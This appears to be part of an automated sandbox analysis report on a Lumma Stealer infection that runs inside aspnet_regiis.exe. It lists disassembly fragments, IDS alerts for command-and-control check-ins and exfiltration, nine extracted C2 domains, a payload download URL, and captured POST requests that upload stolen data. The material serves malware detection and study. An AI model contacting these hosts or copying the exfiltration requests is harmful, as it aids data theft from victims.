Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_02782E78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 3_2_0278BE6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_027787FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h | 3_2_0279FFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ebx, eax | 3_2_0276CFA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 3_2_0279EC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], D6EFB4E0h | 3_2_0279EC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h | 3_2_0279ED50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 6E87DD67h | 3_2_0278AD45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+000001A4h] | 3_2_02769D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [eax], bl | 3_2_0276DDBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [ebp+00h], 0000h | 3_2_02785210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp byte ptr [ecx+eax+01h], 00000000h | 3_2_02787200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h | 3_2_0279F340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx+18h] | 3_2_027743D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edi, edx | 3_2_02769390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000140h] | 3_2_02777828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 7DA30DA1h | 3_2_02777828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [eax], cl | 3_2_027690B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 3_2_027950A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 3_2_02783890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [eax+edi] | 3_2_02783890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [ebp+ecx-20h] | 3_2_02783890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edi, esi | 3_2_02783890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 3_2_02783890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edi, dword ptr [ebp-60h] | 3_2_02783890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 3_2_02788890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+edi-73715825h] | 3_2_02776146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then xor eax, eax | 3_2_02776146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-0002D61Ah] | 3_2_027A0130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 9AFAF935h | 3_2_027A0130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then jmp dword ptr [027A5774h] | 3_2_0277712B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [edi], al | 3_2_0278A90B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [esi+eax-1B130B8Dh] | 3_2_0276B909
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_02787E5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+edx] | 3_2_0277E650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp al, 2Eh | 3_2_02785E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx eax, byte ptr [esp+edx-0Fh] | 3_2_02785E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 4B1BF3DAh | 3_2_0279FEE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then jmp eax | 3_2_0276A2B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 3_2_0277B6CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 3_2_0278B6B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then jmp eax | 3_2_0276A6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+0Ah] | 3_2_0277BE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp edx, esi | 3_2_02798770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [edi], cl | 3_2_0278CF71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [edi], cl | 3_2_0278CF71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_02788748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-000000A7h] | 3_2_02779720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [edi], cl | 3_2_0278B710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 3_2_0278B710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then jmp dword ptr [027A573Ch] | 3_2_02776FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov dword ptr [esp+02h], D264DC1Bh | 3_2_027877F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then jmp eax | 3_2_0279CFD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edx, eax | 3_2_0279B7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 7F7BECC6h | 3_2_0279B7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [eax], cl | 3_2_0278C78B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [edi], dl | 3_2_0278C78B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [edi], cl | 3_2_0278C78B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_02787C36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then push eax | 3_2_0279C42E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx] | 3_2_0279C42E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+ebp-000000D4h] | 3_2_02783400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 3_2_02789400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 3_2_027984FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then push eax | 3_2_0279CCFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, edi | 3_2_027674E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edi, byte ptr [esp+esi-000000E6h] | 3_2_027815B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+02h] | 3_2_027815B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [ebx], cx | 3_2_027815B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+24h] | 3_2_02776D9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [edi], al | 3_2_0278A586

                          Networking

                           Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.32.1:443
                           Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.32.1:443
                           Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49717 -> 104.21.32.1:443
                           Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.32.1:443
                           Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.32.1:443
                           Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.32.1:443
                           Source: Malware configuration extractor | URLs: noisycuttej.shop
                           Source: Malware configuration extractor | URLs: framekgirus.shop
                           Source: Malware configuration extractor | URLs: nearycrepso.shop
                           Source: Malware configuration extractor | URLs: wholersorie.shop
                           Source: Malware configuration extractor | URLs: fancywaxxers.shop
                           Source: Malware configuration extractor | URLs: abruptyopsn.shop
                           Source: Malware configuration extractor | URLs: tirepublicerj.shop
                           Source: Malware configuration extractor | URLs: rabidcowse.shop
                           Source: Malware configuration extractor | URLs: cloudewahsj.shop
                           Source: Joe Sandbox View | IP Address: 104.21.32.1
                           Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                           Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                           Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.32.1:443
                           Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.32.1:443
                           Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.32.1:443
                           Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.32.1:443
                           Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 104.21.32.1:443
                           Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 104.21.32.1:443
                           Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 104.21.32.1:443
                           Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 104.21.32.1:443
                           Source: global traffic | HTTP traffic detected:
                               POST /api HTTP/1.1
                               Connection: Keep-Alive
                               Content-Type: application/x-www-form-urlencoded
                               User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                               Content-Length: 8
                               Host: fancywaxxers.shop
                           Source: global traffic | HTTP traffic detected:
                               POST /api HTTP/1.1
                               Connection: Keep-Alive
                               Content-Type: application/x-www-form-urlencoded
                               User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                               Content-Length: 53
                               Host: fancywaxxers.shop
                           Source: global traffic | HTTP traffic detected:
                               POST /api HTTP/1.1
                               Connection: Keep-Alive
                               Content-Type: multipart/form-data; boundary=AMTB3QLKBFJ98IV
                               User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                               Content-Length: 12823
                               Host: fancywaxxers.shop
                           Source: global traffic | HTTP traffic detected:
                               POST /api HTTP/1.1
                               Connection: Keep-Alive
                               Content-Type: multipart/form-data; boundary=7E5OXTHN8747P
                               User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                               Content-Length: 15053
                               Host: fancywaxxers.shop
                           Source: global traffic | HTTP traffic detected:
                               POST /api HTTP/1.1
                               Connection: Keep-Alive
                               Content-Type: multipart/form-data; boundary=CVKA9J29E8AUJ7
                               User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                               Content-Length: 20549
                               Host: fancywaxxers.shop
                           Source: global traffic | HTTP traffic detected:
                               POST /api HTTP/1.1
                               Connection: Keep-Alive
                               Content-Type: multipart/form-data; boundary=4H4JHYC6MWK5EZIZ
                               User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                               Content-Length: 1280
                               Host: fancywaxxers.shop
                           Source: global traffic | HTTP traffic detected:
                               POST /api HTTP/1.1
                               Connection: Keep-Alive
                               Content-Type: multipart/form-data; boundary=L5A4SY5A1OSHVBRM0
                               User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                               Content-Length: 586242
                               Host: fancywaxxers.shop
                           Source: global traffic | HTTP traffic detected:
                               POST /api HTTP/1.1
                               Connection: Keep-Alive
                               Content-Type: application/x-www-form-urlencoded
                               User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                               Content-Length: 88
                               Host: fancywaxxers.shop
                           Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                           Source: global traffic | DNS traffic detected: DNS query: fancywaxxers.shop
                           Source: unknown | HTTP traffic detected:
                               POST /api HTTP/1.1
                               Connection: Keep-Alive
                               Content-Type: application/x-www-form-urlencoded
                               User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                               Content-Length: 8
                               Host: fancywaxxers.shop
                           Source: aspnet_regiis.exe, 00000003.00000003.2740892244.0000000002B01000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3271562153.0000000002B0F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002AFF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2141010359.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://147.45.47.81/conhost.exe
                           Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                           Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                           Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                           Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                           Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                           Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                           Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                           Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                           Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                           Source: Amcache.hve.6.dr | String found in binary or memory: http://upx.sf.net
                           Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
                           Source: aspnet_regiis.exe, 00000003.00000003.2068440154.0000000004F49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
                           Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                           Source: aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                           Source: aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                           Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                           Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                           Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                           Source: aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                           Source: aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                           Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                           Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                           Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                           Source: aspnet_regiis.exe, 00000003.00000003.2100987956.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2053645205.0000000002B1D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3271562153.0000000002B0F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2101109857.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2141010359.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2101077815.0000000002B1D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2065068299.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/
                           Source: aspnet_regiis.exe, 00000003.00000003.2063582512.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2064491018.0000000004F34000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/X
                           Source: aspnet_regiis.exe, 00000003.00000003.2053645205.0000000002B1D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2065068299.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/YB
                           Source: aspnet_regiis.exe, 00000003.00000003.2740892244.0000000002B01000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002AFF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2052375536.0000000004F97000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2052400393.0000000004F99000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/api
                           Source: aspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/api9Bd
                           Source: aspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/apiAB
                           Source: aspnet_regiis.exe, 00000003.00000003.2740892244.0000000002B01000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2140838210.0000000002AFF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/api_
                           Source: aspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/int32
                           Source: aspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fancywaxxers.shop/n
                           Source: aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                           Source: aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                           Source: aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                           Source: aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                           Source: aspnet_regiis.exe, 00000003.00000003.2070941631.0000000004F37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                           Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
